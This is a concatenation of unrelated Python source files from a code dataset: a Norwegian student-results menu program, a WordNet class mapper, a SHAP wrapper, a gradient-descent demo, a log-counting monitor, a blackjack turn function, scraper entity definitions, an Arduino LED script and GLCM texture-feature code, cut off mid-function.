objektInfo = [finnResultat, emneKode, studentNummer]\r\n if (not finnesFraFor(objektInfo)):\r\n registrer(resultatInfo)\r\n skrivMeny()\r\n else:\r\n print(\"\\n\\nResultatet finnes fra før. Kunne derfor ikke registrere data.\") \r\n skrivMeny()\r\n elif (brukerValg == 2): #Slett\r\n studentNummer = input(\"\\n1. Skriv inn studentnummer til studenten du vil slette\\n\")\r\n objektInfo = [finnResultat, studentNummer]\r\n slett = True\r\n if (not finnesFraFor(objektInfo)):\r\n slettStudent(studentNummer)\r\n slett = False\r\n skrivMeny()\r\n else:\r\n slett = False\r\n print(\"Studenten har eksamensresultater tilknyttet seg, og kan derfor ikke slettes\") \r\n skrivMeny()\r\n elif (brukerValg == 3):\r\n studentNummer = input(\"\\n1. Skriv inn studentnummer til studenten du vil se på karakterlisten for\\n\")\r\n skrivUtKarakterliste(studentNummer)\r\n skrivMeny()\r\n elif (brukerValg == 4):\r\n emneKode = input(\"\\n1. Skriv inn emnekode til studiet du vil se på sensurlisten for\\n\")\r\n skrivUtSensurliste(emneKode)\r\n skrivMeny()\r\n elif (brukerValg == 5):\r\n quit()\r\n\r\ndef skrivMeny():\r\n global harValgt\r\n global forsteGang\r\n global gyldigMenyvalg\r\n\r\n gyldigMenyvalg = [1, 2, 3, 4, 5]\r\n harValgt = False\r\n\r\n while not (harValgt):\r\n objektInfo = []\r\n global brukerValg\r\n if (not forsteGang):\r\n brukerValg = input(\"\\nMeny\\n1. Registrering\\n2. Sletting\\n3. Skriv ut karakterliste for student\\n4. Skriv ut sensurliste for emne\\n5. Avslutt\\n\\n\")\r\n brukerValg = int(brukerValg)\r\n for i in gyldigMenyvalg:\r\n if (i == brukerValg):\r\n harValgt = True\r\n forsteGang = False\r\n valgMeny()\r\n \r\n\r\ndef registrer(infoListe):\r\n global regStudent\r\n global regEmne\r\n global regResultat\r\n \r\n if (regStudent):\r\n studNummer = infoListe[0]\r\n studFornavn = infoListe[1]\r\n studEtternavn = infoListe[2]\r\n studium = infoListe[3]\r\n\r\n if os.path.isfile(studentFil): #Filen eksisterer fra før\r\n studentListe = open(studentFil, \"a\")\r\n else: #Finnes ikke fra før\r\n studentListe = open(studentFil, \"w+\")\r\n\r\n studentListe.write(str(studNummer) + \"\\n\")\r\n studentListe.write(str(studFornavn) + \"\\n\")\r\n studentListe.write(str(studEtternavn) + \"\\n\")\r\n studentListe.write(str(studium) + \"\\n\")\r\n\r\n studentListe.close()\r\n regStudent = False\r\n elif(regEmne):\r\n emneKode = infoListe[0]\r\n emneNavn = infoListe[1]\r\n if os.path.isfile(emneFil):\r\n emneListe = open(emneFil, \"a\")\r\n else:\r\n emneListe = open(emneFil, \"w+\")\r\n\r\n emneListe.write(str(emneKode) + \"\\n\")\r\n emneListe.write(str(emneNavn) + \"\\n\")\r\n\r\n emneListe.close()\r\n regEmne = False\r\n elif(regResultat):\r\n emneKode = infoListe[0]\r\n studentNummer = infoListe[1]\r\n karakter = infoListe[2]\r\n\r\n if os.path.isfile(resultatFil):\r\n resultatListe = open(resultatFil, \"a\")\r\n else: #Finnes ikke fra før\r\n resultatListe = open(resultatFil, \"w+\")\r\n \r\n resultatListe.write(str(emneKode) + \"\\n\")\r\n resultatListe.write(str(studentNummer) + \"\\n\")\r\n resultatListe.write(str(karakter) + \"\\n\")\r\n\r\n resultatListe.close()\r\n regResultat = False\r\n\r\n\r\ndef slettStudent(studentNummer):\r\n index = 0\r\n if os.path.isfile(studentFil): #Filen eksisterer fra før\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n for student in studentListe:\r\n if (student == studentNummer):\r\n del studentListe[index + 3]\r\n del studentListe[index + 2]\r\n del studentListe[index + 1]\r\n del studentListe[index]\r\n index += 1\r\n \r\n studFil = open(studentFil, \"w\")\r\n studFil.write(\"\\n\".join(studentListe))\r\n studFil.write(\"\\n\")\r\n studFil.close()\r\n else:\r\n print(\"\\nFilen med studenter finnes ikke. Kan derfor ikke slette studenten.\\n\")\r\n \r\ndef skrivUtKarakterliste(studentNummer):\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n resultatListe = [line.rstrip('\\n') for line in open(resultatFil)]\r\n index = 0\r\n for studentInfo in studentListe:\r\n if (studentInfo == studentNummer):\r\n print(\"\\n\")\r\n print(\"Studentnummer: \" + studentInfo)\r\n print(\"Fornavn: \" + studentListe[index + 1])\r\n print(\"Etternavn: \" + studentListe[index + 2])\r\n print(\"Studium: \" + studentListe[index + 3])\r\n index += 1\r\n\r\n j = 0\r\n funnet = False\r\n for resultatInfo in resultatListe:\r\n if (resultatInfo == studentNummer):\r\n if (not funnet):\r\n print(\"\\n\")\r\n print(\"Resultatliste for student med studentnummer: \" + studentNummer)\r\n funnet = True\r\n print(\"Emnekode: \" + resultatListe[j - 1])\r\n print(\"Eksamensresultat: \" + resultatListe[j + 1])\r\n j += 1\r\n\r\ndef skrivUtSensurliste(emneKode):\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n resultatListe = [line.rstrip('\\n') for line in open(resultatFil)]\r\n emneListe = [line.rstrip('\\n') for line in open(emneFil)]\r\n alleStudenterIEmne = []\r\n\r\n index = 0\r\n for emne in emneListe:\r\n if (emne == emneKode):\r\n print(\"\\n\")\r\n print(\"Emnekode: \" + emne)\r\n print(\"Emnenavn: \" + emneListe[index + 1])\r\n index += 1\r\n\r\n index = 0\r\n for resultat in resultatListe:\r\n if (resultat == emneKode):\r\n print(resultat)\r\n alleStudenterIEmne.append(resultatListe[index + 1])\r\n alleStudenterIEmne.append(resultatListe[index + 2])\r\n index += 1\r\n\r\n i = 0\r\n j = 0\r\n funnet = False\r\n if (len(alleStudenterIEmne) > 0):\r\n for student in studentListe:\r\n for studentIEmne in alleStudenterIEmne:\r\n if (student == studentIEmne):\r\n if (not funnet):\r\n funnet = True\r\n print(\"\\n\")\r\n print(\"Alle studenter i emne: \\n\")\r\n print(\"Studentnummer: \" + studentListe[i])\r\n print(\"Fornavn: \" + studentListe[i + 1])\r\n print(\"Etternavn: \" + studentListe[i + 2])\r\n print(\"Studium: \" + studentListe[i + 3])\r\n print(\"Karakter: \" + alleStudenterIEmne[j + 1])\r\n print(\"\\n\")\r\n i += 4\r\n j += 2\r\n\r\n\r\ndef finnesFraFor(objektInfo):\r\n global finnStudent\r\n global finnEmne\r\n global finnResultat\r\n global finnes\r\n global slett\r\n\r\n finnes = False\r\n \r\n print(\"\\n\")\r\n if (objektInfo[0] == finnStudent and os.path.isfile(studentFil)):\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n if (len(studentListe) > 0):\r\n for studentInfo in studentListe:\r\n if (studentInfo == str(objektInfo[1])):\r\n finnes = True\r\n objektInfo = []\r\n return finnes\r\n return False\r\n elif(objektInfo[0] == finnEmne and os.path.isfile(emneFil)):\r\n emneListe = [line.rstrip('\\n') for line in open(emneFil)]\r\n if (len(emneListe) > 0):\r\n for emneInfo in emneListe:\r\n if (str(emneInfo) == str(objektInfo[1])):\r\n finnes = True\r\n objektInfo = []\r\n return finnes\r\n return False\r\n elif(objektInfo[0] == finnResultat and os.path.isfile(resultatFil)):\r\n resultatListe = [line.rstrip('\\n') for line in open(resultatFil)]\r\n index = 0\r\n if (slett):\r\n for resultatInfo in resultatListe:\r\n if (resultatInfo == objektInfo[1]):\r\n finnes = True\r\n objektInfo = []\r\n slett = False\r\n return finnes\r\n slett = False\r\n return finnes\r\n else:\r\n if (len(resultatListe) > 0):\r\n for resultatInfo in resultatListe:\r\n if (str(resultatInfo) == str(objektInfo[1]) and str(resultatListe[index + 1]) == str(objektInfo[2])):\r\n finnes = True\r\n return finnes\r\n index += 1\r\n return False\r\n else:\r\n objektInfo = []\r\n return False\r\n\r\n\r\n\r\nskrivMeny()\r\n","repo_name":"MathiasGaptjern/Tidligere-oppgaver","sub_path":"PRG1000R-Oblig2-13.py","file_name":"PRG1000R-Oblig2-13.py","file_ext":"py","file_size_in_byte":12220,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74353398634","text":"\"\"\"\nHandles the projection between words and classes in the dataset.\n\"\"\"\nimport database\nimport query_creator\nimport wn_dictionary\nfrom nltk.corpus import wordnet as wn\n\n# Returns the class IRI for a name string like \"Restaurant\" or \"\" if no match has been found.\ndef get_class_name(entity_name) :\n\n # street is mapped wrong -> extra case here\n if (entity_name.lower() == \"street\") :\n return \"http://linkedgeodata.org/ontology/ResidentialHighway\"\n \n class_name = wn_dictionary.wn_lexicon.get(entity_name.title(), \"\")\n return class_name[1:-1]\n\n# Returns a classified synonym for a noun which is in the dataset.\ndef synonym(noun) :\n syns = synonyms(noun)\n keys = wn_dictionary.wn_lexicon.keys()\n name = \"\"\n for syn in syns :\n if (syn in keys) :\n name = syn\n break;\n \n if (name == \"\") :\n raise RuntimeError(\"No class found for '\" + noun + \"'\")\n \n return name.lower()\n \n\n# Returns all synonyms for a word in natural language using wordnet.\ndef synonyms(word) :\n \"\"\"Returns lowercase string without articles \n >>> print(synonym(\"eatery\"))\n restaurant\n \"\"\"\n synsets = wn.synsets(word) \n syns = set()\n for synset in synsets : # different meanings of a word e.g. 'bank'\n for syn in synset.lemma_names() : # names for each different meaning\n syns.add(syn.title()) # add all synonym names to the result set\n \n return syns\n\n# Classifies a name string like \"Restaurants\", i.e. it uses word net and returns the class IRI for the entity.\ndef classify(entity_name) :\n\n class_name = get_class_name(entity_name)\n \n # If there is no class for the name, use wordnet and look for classes synonyms\n if (len(class_name) == 0) :\n # use wordnet and try again\n wn_words = synonyms(entity_name)\n for word in wn_words :\n class_name = get_class_name(word)\n # first match is used\n if (len(class_name) > 0) :\n break\n \n # If the string has several tokens like 'ice cream shop' try again with parts 'ice cream' and 'cream shop'\n words = entity_name.split()\n if (len(class_name) == 0 and len(words) > 1) :\n try :\n class_name = classify(' '.join(words[:-1]))[1:-1] # <> have to be removed\n except RuntimeError :\n class_name = \"\"\n \n if (class_name == \"\") :\n try :\n class_name = classify(' '.join(words[1:]))[1:-1] # <> have to be removed\n except RuntimeError :\n class_name = \"\"\n \n \n # In case that wordnet could not discover any classes throw error\n if (len(class_name) == 0) :\n raise RuntimeError(\"No class found for '\" + entity_name + \"'\")\n \n return \"<\" + class_name + \">\"\n","repo_name":"lfuhr/geoQAS","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41653277406","text":"import shap\n\nfrom shap_library_utils.explainers._conditionalshap import ConditionalShap\nfrom shap_library_utils.explainers._manifoldshap import ManifoldShap\nfrom utilities.models import MLPWrapper\n\n\nclass ShapExplainerWrapper:\n \"\"\"\n Provides a wrapper around Shap library,\n to easily use the library to calculate shapley values\n \"\"\"\n def __init__(self, model, data, manifold=None, algorithm='sampling'):\n self.model = model\n self.data = data\n self.manifold = manifold\n self.algorithm = algorithm\n\n def calculate_shapley_values(self, datapoints, **kwargs):\n if self.algorithm == \"kernel\":\n explainer = shap.KernelExplainer(model=MLPWrapper(self.model), data=self.data.numpy())\n shap_values = explainer.shap_values(datapoints.numpy())\n elif self.algorithm == \"sampling\":\n explainer = shap.SamplingExplainer(model=MLPWrapper(self.model), data=self.data.numpy())\n shap_values = explainer(datapoints.numpy(), nsamples=3000).values\n elif self.algorithm == \"manifold\":\n if self.manifold is None:\n raise ValueError(\"Input manifold to calculate ManifoldShap\")\n explainer = ManifoldShap(model=MLPWrapper(self.model), data=self.data.numpy(), manifold=self.manifold)\n shap_values = explainer(datapoints.numpy(), nsamples=2000).values\n elif self.algorithm == \"conditional\":\n explainer = ConditionalShap(model=MLPWrapper(self.model), data=self.data.numpy(), **kwargs)\n shap_values = explainer.shap_values(datapoints.numpy())\n else:\n raise ValueError(\"Invalid algorithm name. Must be one of ['sampling', 'kernel', 'manifold', 'conditional'].\")\n return shap_values[:, [0]], shap_values[:, [1]]\n","repo_name":"amazon-science/manifold-restricted-shapley","sub_path":"OODShapley/shap_library_utils/shap_wrapper.py","file_name":"shap_wrapper.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4235646229","text":"import numpy as np\nfrom func2D_incognito_NEW import func2D_incognito as funcao\nfrom func2D_incognito_NEW import grad_func2D_incognito as grad_funcao\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\n#Funcao descida de gradiente para duas variaveis\ndef gradiente_descida(inicio, f, grad_funcao):\n# Precisao da solucao\n precisao = 0.001\n\n# Baixa taxa de aprendizado\n taxa_aprendizado = 0.01\n\n # limite de interacoes\n max_inter = 10000\n x_novo = inicio\n res = []\n for i in range(max_inter):\n x_velho = x_novo\n\n x_novo = x_velho - taxa_aprendizado * grad_funcao(x_velho)\n f_x_novo = funcao(x_novo)\n f_x_velho = funcao(x_velho)\n res.append([x_novo, f_x_novo])\n\n print(f_x_novo - f_x_velho)\n#Valors de minimos locais\n if(abs (f_x_novo - f_x_velho) < precisao):\n print(\"Precisao alcancada: %f \" % (f_x_novo - f_x_velho))\n return np.array(res)\n print(\"Iteracao maxima alcancada\")\n return np.array(res)\n\n#intervalo para amostragem\ninicio_intervalo = [-3,-3]\nfim_intervalo = [3,3]\npasso = 0.1\n \nlista1 = []\nlista2 = []\nlista3 = []\n\n#valores para calculo da funcao\nfor var1, var2 in zip(np.arange(inicio_intervalo[0], fim_intervalo[0], passo), np.arange(inicio_intervalo[1], fim_intervalo[1], passo)):\n\n inicio = [var1, var2]\n retorno = gradiente_descida(inicio, funcao, grad_funcao)\n print(\"Minimo local em: \")\n print(retorno[-1][0])\n lista1.append(var1)\n lista2.append(var2)\n \nvar1 = np.array(lista1)\nvar2 = np.array(lista2) \n\n#Geracao do grafico com o comportamento da funcao no intervalo considerado\n\neixo_X, eixo_Y = np.meshgrid(var1, var2)\n\neixo_X_flatten = eixo_X.reshape(-1)\neixo_Y_flatten = eixo_Y.reshape(-1)\n\nvalores_funcao = np.array([funcao([i, j]) for i, j in zip(eixo_X_flatten, eixo_Y_flatten)])\nvalores_funcao_shape = valores_funcao.reshape(eixo_X.shape)\n\neixo_Z = valores_funcao_shape\ngraph = plt.axes(projection='3d')\ngraph.set_xlabel('x Values')\ngraph.set_ylabel('y Values')\ngraph.set_zlabel('z(x,y) values')\ngraph.plot_surface(eixo_X, eixo_Y, eixo_Z, color='green')\nplt.show()\n","repo_name":"AntonioLoca/Redes-Neurais","sub_path":"func2D_incognito_call_ALT.py","file_name":"func2D_incognito_call_ALT.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"123120429","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport os\nimport re\n\nkeys = [ 'yadrop.auth.blackbox.ok',\n'yadrop.auth.blackbox.error',\n'yadrop.auth.cache'\n]\n\nitems = dict()\n\nfor key in keys:\n\titems[key] = 0\n\nfin = os.popen('/usr/bin/mymtail.sh /var/log/yadrop/auth.log yadrop', 'r')\n\nindex1 = re.compile('ya_blackbox:\\d+:info .* type=blackbox code=200')\nindex2 = re.compile('ya_blackbox:\\d+:error .* type=blackbox')\nindex3 = re.compile('yadrop_auth:\\d+:info .* type=auth_cache')\n\nfor line in fin:\n\tmatches = index1.findall(line)\n\tif len(matches):\n\t\titems['yadrop.auth.blackbox.ok'] += 1\n\n\tmatches = index2.findall(line)\n\tif len(matches):\n\t\titems['yadrop.auth.blackbox.error'] += 1\n\n\tmatches = index3.findall(line)\n\tif len(matches):\n\t\titems['yadrop.auth.cache'] += 1\n\nfor key, value in items.items():\n print(\"%s %s\" % (key, value))\n\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/disk-testing/roots/units/yadrop/files/usr/lib/yandex-graphite-checks/available/yadrop-auth.py","file_name":"yadrop-auth.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5887828183","text":"from Paquet import piocheCarte, valeurCarte\r\nimport continues\r\n\r\ndef tourJoueur(j,paquet, dicoScores, listeJoueur):\r\n score=dicoScores[j]\r\n\r\n print(\"** tour .\",1,\" \"*6,\"Joueur :\",j,\" \"*6,\"main actuelle :\", score,\"**\")\r\n print(\"\")\r\n\r\n condition=continues()\r\n\r\n if condition==True:\r\n carte=piocheCarte(paquet,1)\r\n nb=valeurCarte(carte[0],j)\r\n score=nb+score\r\n\r\n if score==21:\r\n print(\"\")\r\n return score\r\n\r\n elif score>21:\r\n listeJoueur.remove(j)\r\n print(\"perdant\",listeJoueur)\r\n print (\"Vous avez dépassé 21 vous avez perdu\")\r\n print(\"\")\r\n return score\r\n\r\n\r\n else:\r\n print (\"Votre nouvelle main est :\",score)\r\n print(\"\")\r\n return score\r\n\r\n else:\r\n print(\"coucher\",listeJoueur)\r\n listeJoueur.remove(j)\r\n print (\"Vous avez décidé de vous coucher\")\r\n print(\"\")\r\n return score\r\n","repo_name":"CryStretch/BlackJack","sub_path":"TourJoueur/tourJoueur.py","file_name":"tourJoueur.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71859853673","text":"'''\n@Descripttion: \n@version: \n@Author: Bennett\n@Date: 2020-04-22 08:42:47\n@LastEditTime: 2020-04-24 10:37:18\n'''\n#!/usr/bin/env python3\n# coding=utf-8\n# author=XingLong Pan\n# date=2016-12-05\n\n# 你可以理解为scrapy框架中的item\nmovie = {\n # 电影id\n 'douban_id': '',\n # 电影名字\n 'title': '',\n # 导演\n 'directors': '',\n # 编剧\n 'scriptwriters': '',\n # 演员\n 'actors': '',\n #\n 'types': '',\n 'release_region': '',\n 'release_date': '',\n 'alias': '',\n 'languages': '',\n 'duration': '',\n 'score': 0.0,\n 'description': '',\n 'tags': '',\n 'recommendMovie': '',\n 'vote_num': '',\n 'rating_per_stars5': '',\n 'rating_per_stars4': '',\n 'rating_per_stars3': '',\n 'rating_per_stars2': '',\n 'rating_per_stars1': '',\n 'comment_num': ''\n\n}\n\nmovieComment = {\n \"douban_id\": '',\n \"comment_url\": '',\n \"star\": '',\n \"content\": '',\n \"comment_id\": '',\n \"people_id\": '',\n \"people\": '',\n \"useful_num\": '',\n \"time\": '',\n \"people_url\": '',\n}\n\npersonalInfo = {\n \"pid\": '',\n \"name\": '',\n \"location\": '',\n \"introduction\": '',\n \"follow_num\": '', # 关注人的数量,但其中包含了一些已经注销了账号的,注销账号的不爬取\n \"personUrl\": '',\n \"register_time\": '',\n \"follow_url\": '',\n \"do\":'',\n \"wish\":'',\n \"collect\":'',\n \"do_num\":'',\n \"wish_num\":'',\n \"collect_num\":''\n}\n\nfollowPersonUrl = {\n \"originalId\": '', # 源豆瓣人的名字\n \"followId\": '', # 关注人的id(唯一)\n \"followUrl\": '' # 关注人主页的url\n}\n\nwishMovie = {\n \"douban_id\": '', # 源豆瓣人的名字\n \"people_id\": '', # 关注人的id(唯一)\n \"time\": '' # 关注人主页的url\n}\n\n","repo_name":"Bennettsong/douban_spider","sub_path":"page_parser/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9050695211","text":"\"\"\"\r\nSend message from arduino and print it on a computer using only python on the computer\r\n\"\"\"\r\n\r\nimport serial\r\n\r\nif __name__ == \"__main__\":\r\n Serial = serial.Serial('com3', 9600)\r\n print(Serial.readline())\r\n print(\"Enter 1 to ON LED and 0 to OFF LED : \")\r\n\r\n while 1:\r\n input_data = input()\r\n\r\n if input_data == '1':\r\n Serial.write(str.encode('1'))\r\n print(\"LED ON\")\r\n\r\n if input_data == '0':\r\n Serial.write(str.encode('0'))\r\n print(\"LED OFF\")\r\n","repo_name":"im-Rajat/Learning-Python","sub_path":"Practice-Python/Assignment2/Q1_2.py","file_name":"Q1_2.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12281110829","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 15 23:07:25 2020\r\n\r\n@author: mann\r\n\"\"\"\r\nfrom skimage import io, color\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport PIL.Image as Image\r\nimport numpy as np\r\nimport cv2\r\nfrom scipy.stats import skew\r\nfrom sklearn.feature_selection import RFE\r\nfrom sklearn.svm import SVR\r\n\r\npath_in ='datos_entrenamiento'\r\npath_out ='datos_procesados_lab_3'\r\nlistaImagenesEntrada = os.listdir(path_in)\r\n\r\n\r\n\r\ncaracteristicasDeEntrada=[]\r\n\r\ndef genera_caracteristicas():\r\n angulos_reglas = [0,45,90,-45]\r\n codif = ['1_','2_','3_','4_','5_','6_','7_','8_','9_','10_','11_','12_','13_','14_','15_','16_']\r\n parametros = ['homogeneidad','glcmMedia','varianza','entropia','correlacion']\r\n\r\n for angulo in angulos_reglas:\r\n for parametro in parametros:\r\n caracteristicasDeEntrada.append(parametro+str(angulo))\r\n colores = ['CanalA','CanalB']\r\n for color in colores : \r\n for cod in codif:\r\n caracteristicasDeEntrada.append(cod + color)\r\n return caracteristicasDeEntrada\r\n \r\n\r\ndef criba_coeficientes(coeficientes,etiquetas):\r\n if(len(etiquetas)==len(coeficientes)):\r\n# np.amax(coeficientes,resul) \r\n coefiOrdenados = np.argsort(coeficientes)\r\n listaCoeficientes2 = coefiOrdenados[0:5]\r\n listaCoeficientes1 = coefiOrdenados[-5:]\r\n \r\n print(listaCoeficientes1,listaCoeficientes2)\r\n print(\"Parametros mas relevantes: \")\r\n for i in range(5):\r\n print(etiquetas[listaCoeficientes1[i]],\" \",coeficientes[listaCoeficientes1[i]])\r\n print(\"Parametros menos relevantes: \")\r\n for i in range(5):\r\n print(etiquetas[listaCoeficientes2[i]],\" \",coeficientes[listaCoeficientes2[i]]) \r\n else:\r\n \r\n print(\"Error, etiquetas y caracteristicas de tamaños diferentes\")\r\n \r\n# criba_coeficientes(coef,caracteristicasDeEntrada) \r\n\r\ndef criba_coeficientes_RFE(X_Train,Y_Train,etiquetas):\r\n estimator = SVR(kernel=\"linear\")\r\n selector = RFE(estimator, n_features_to_select=10,step=1)\r\n selector = selector.fit(X_Train,Y_Train)\r\n selector.support_\r\n ranking = selector.ranking_\r\n print(\"Caracteristicas mas relevantes\")\r\n for i in range(len(ranking)):\r\n if(ranking[i]==1):\r\n print(etiquetas[i])\r\n \r\n\r\ndef calcula_varias_matrices_coocurrencia2(imagen,valores,media,tamaños_reglas,angulos_reglas):\r\n listaParametros=[]\r\n listaMatrices =[]\r\n #print(\"Comienza el calculo de las matrices de coocurrencia\")\r\n for tama in tamaños_reglas:\r\n for angulo in angulos_reglas:\r\n reglaMatriz = genera_regla(tama,angulo)\r\n # print(valores,imagen,reglaMatriz)\r\n matrizCoocurrencia = calcula_matriz_coocurrencia(valores,imagen,reglaMatriz)\r\n listaMatrices.append(matrizCoocurrencia)\r\n listaParametros+=extrae_parametros_matriz_gris(matrizCoocurrencia,media,valores)\r\n return listaParametros,listaMatrices\r\n\r\ndef calcula_varias_matrices_coocurrencia3(imagen,valores,media,tamaños_reglas,angulos_reglas):\r\n listaParametros=[]\r\n lista_matrices = []\r\n \r\n for tama in tamaños_reglas:\r\n for angulo in angulos_reglas:\r\n lista_matrices.append(genera_regla(tama,angulo))\r\n GLCMS = calcula_varias_matrices_GLCM(valores,imagen,lista_matrices)\r\n for glcm in GLCMS:\r\n # print(tamaños_reglas,angulos_reglas)\r\n listaParametros += extrae_parametros_matriz(glcm,media,valores)\r\n print(listaParametros)\r\n return listaParametros\r\n\r\ndef calcula_varias_matrices_coocurrencia4(imagen,valores,tamaños_reglas,angulos_reglas):\r\n listaMatrices =[]\r\n #print(\"Comienza el calculo de las matrices de coocurrencia\")\r\n for tama in tamaños_reglas:\r\n for angulo in angulos_reglas:\r\n reglaMatriz = genera_regla(tama,angulo)\r\n matrizCoocurrencia = calcula_matriz_coocurrencia(valores,imagen,reglaMatriz)\r\n listaMatrices.append(matrizCoocurrencia)\r\n return listaMatrices\r\n\r\ndef extrae_parametros_matriz_gris(matrizCoocurrencia,media,cuantizacion):\r\n\r\n matrizCoocurrenciaProb = probabilidad_matriz_coocurrencia(matrizCoocurrencia,cuantizacion)\r\n hMatriz,wMatriz = matrizCoocurrenciaProb.shape[:2]\r\n \r\n media = np.mean(matrizCoocurrencia)\r\n homogeneidad = 0\r\n # contraste = 0\r\n glcmMedia = 0\r\n varianza = 0\r\n entropia = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz):\r\n # print(cuantizacion)\r\n # print(np.power((i-j),2))\r\n homogeneidad += matrizCoocurrenciaProb[i,j]/(1+np.power((i-j),2))\r\n # contraste += matrizCoocurrenciaProb[i,j]*np.power((i-j),2)\r\n glcmMedia += i*matrizCoocurrenciaProb[i,j]\r\n varianza += matrizCoocurrenciaProb[i,j]*np.power((i-media),2)\r\n if(matrizCoocurrenciaProb[i,j]!=0):\r\n entropia += -1*matrizCoocurrenciaProb[i,j]*np.log(matrizCoocurrenciaProb[i,j])\r\n\r\n correlacion = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz): \r\n correlacion += matrizCoocurrenciaProb[i,j]*((i-glcmMedia)*(j-glcmMedia)/\r\n (np.sqrt(varianza*varianza)))\r\n listaParametros=[]\r\n# listaParametros.append(\"=================\"+'\\n')\r\n# listaParametros.append(\"Homogeneidad es: \"+str(homogeneidad)+'\\n')\r\n listaParametros.append(homogeneidad)\r\n listaParametros.append(glcmMedia)\r\n listaParametros.append(varianza)\r\n listaParametros.append(entropia)\r\n listaParametros.append(correlacion)\r\n# listaParametros.append(\"Contraste es: \"+str(contraste)+'\\n')\r\n# listaParametros.append(\"GLCM media es: \"+str(glcmMedia)+'\\n')\r\n# listaParametros.append(\"Varianza es: \"+str(varianza)+'\\n')\r\n# listaParametros.append(\"Desviacion tipica es: \"+str(np.sqrt(varianza))+'\\n')\r\n# listaParametros.append(\"Entropia es: \"+str(entropia)+'\\n')\r\n# listaParametros.append(\"Correlacion es: \"+str(correlacion)+'\\n')\r\n# listaParametros.append(\"Media es: \"+str(media))\r\n # print(len(listaParametros)) \r\n return listaParametros\r\n\r\n \r\n \r\ndef extrae_parametros_matriz_color(matrizCoocurrencia,media,centros):\r\n\r\n matrizCoocurrenciaProb = probabilidad_matriz_coocurrencia(matrizCoocurrencia)\r\n # matrizCoocurrenciaProb = matrizCoocurrencia\r\n hMatriz,wMatriz = matrizCoocurrenciaProb.shape[:2]\r\n \r\n \r\n homogeneidad = 0\r\n # contraste = 0\r\n glcmMedia = [0,0,0]\r\n varianza = 0\r\n entropia = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz):\r\n # print(cuantizacion)\r\n # print(np.power((i-j),2))\r\n homogeneidad += matrizCoocurrenciaProb[i,j]/(1+np.sqrt(np.power((centros[i,0]-centros[j,0]),2)\r\n +np.power((centros[i,1]-centros[j,1]),2)\r\n +np.power((centros[i,2]-centros[j,2]),2)))\r\n # contraste += matrizCoocurrenciaProb[i,j]*np.power((i-j),2)\r\n glcmMedia[0] += matrizCoocurrenciaProb[i,j]*(centros[i,0])\r\n glcmMedia[1] += matrizCoocurrenciaProb[i,j]*(centros[i,1])\r\n glcmMedia[2] += matrizCoocurrenciaProb[i,j]*(centros[i,2])\r\n \r\n \r\n if(matrizCoocurrenciaProb[i,j]!=0):\r\n entropia += -1*matrizCoocurrenciaProb[i,j]*np.log(matrizCoocurrenciaProb[i,j])\r\n\r\n correlacion = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz):\r\n varianza += matrizCoocurrenciaProb[i,j]*(np.power((centros[i,0]-glcmMedia[0]),2)\r\n +np.power((centros[i,1]-glcmMedia[1]),2)\r\n +np.power((centros[i,2]-glcmMedia[2]),2))\r\n for i in range(hMatriz):\r\n for j in range(wMatriz): \r\n correlacion += matrizCoocurrenciaProb[i,j]*((np.sqrt(np.power((centros[i,0]-glcmMedia[0]),2)\r\n +np.power((centros[i,1]-glcmMedia[1]),2)\r\n +np.power((centros[i,2]-glcmMedia[2]),2)))\r\n *(np.sqrt(np.power((centros[j,0]-glcmMedia[0]),2)\r\n +np.power((centros[j,1]-glcmMedia[1]),2)\r\n +np.power((centros[j,2]-glcmMedia[2]),2)))/\r\n (np.sqrt(varianza*varianza)))\r\n \r\n \r\n listaParametros=[]\r\n# listaParametros.append(\"=================\"+'\\n')\r\n# listaParametros.append(\"Homogeneidad es: \"+str(homogeneidad)+'\\n')\r\n listaParametros.append(homogeneidad)\r\n listaParametros.append(glcmMedia[0])\r\n listaParametros.append(glcmMedia[1])\r\n listaParametros.append(glcmMedia[2])\r\n listaParametros.append(varianza)\r\n listaParametros.append(entropia)\r\n listaParametros.append(correlacion)\r\n# listaParametros.append(\"Contraste es: \"+str(contraste)+'\\n')\r\n# listaParametros.append(\"GLCM media es: \"+str(glcmMedia)+'\\n')\r\n# listaParametros.append(\"Varianza es: \"+str(varianza)+'\\n')\r\n# listaParametros.append(\"Desviacion tipica es: \"+str(np.sqrt(varianza))+'\\n')\r\n# listaParametros.append(\"Entropia es: \"+str(entropia)+'\\n')\r\n# listaParametros.append(\"Correlacion es: \"+str(correlacion)+'\\n')\r\n# listaParametros.append(\"Media es: \"+str(media))\r\n # print(len(listaParametros)) \r\n return listaParametros\r\n\r\ndef probabilidad_matriz_coocurrencia(matriz):\r\n 